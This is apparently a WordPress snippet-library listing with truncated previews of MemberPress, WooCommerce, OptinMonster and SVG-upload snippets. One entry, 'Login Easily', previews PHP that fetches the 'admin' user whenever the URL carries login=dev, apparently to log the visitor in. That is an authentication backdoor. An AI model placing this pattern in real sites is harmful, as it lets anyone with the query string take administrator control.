MemberPress: Change Username Field’s Placeholder and/or Label of the Field on Login Page
The first code snippet will customize the “Username or Email” placeholder on the Username field on…
Login Easily
function auto_login() { if (isset($_GET['login']) && $_GET['login'] === 'dev') { $user = get_user_by('login', 'admin'); if ($user)…
MemberPress: Remove a User Role After Subscription to a Specific Membership Expires
The code snippet will remove the specified role from a user after the user’s subscription to…
MemberPress: Kit (formerly ConvertKit) - Remove Kit Inactive Tag for Inactive Subscribers
By default, MemberPress integration with Kit will add the “inactive” tag when a user becomes inactive…
DJ ANIMATIONS MUSICALES
Animation musicales des soirées privées et publiques
Google adsanse
To get your site ready to show ads, copy and paste this code between the tags…
WooCommerce Delivery Address Popup – Sync Address in Header & Checkout
Enhance your WooCommerce store with an Amazon-style "Deliver to" address popup. Allow customers to select or…
What is Available
document.addEventListener('om.Campaign.load', function(event) { console.log(event.detail); });
om.Campaign.afterShow
document.addEventListener('om.Campaign.afterShow', function(event) { // This event is passed the Campaign object console.log(event.detail.Campaign); } );
om.Analytics.conversion
document.addEventListener('om.Analytics.conversion', function(event) { // This event is passed the Campaign object console.log(event.detail.Campaign); // This event is…
Allow SVG Files Upload
Add support for SVG files to be uploaded in WordPress media.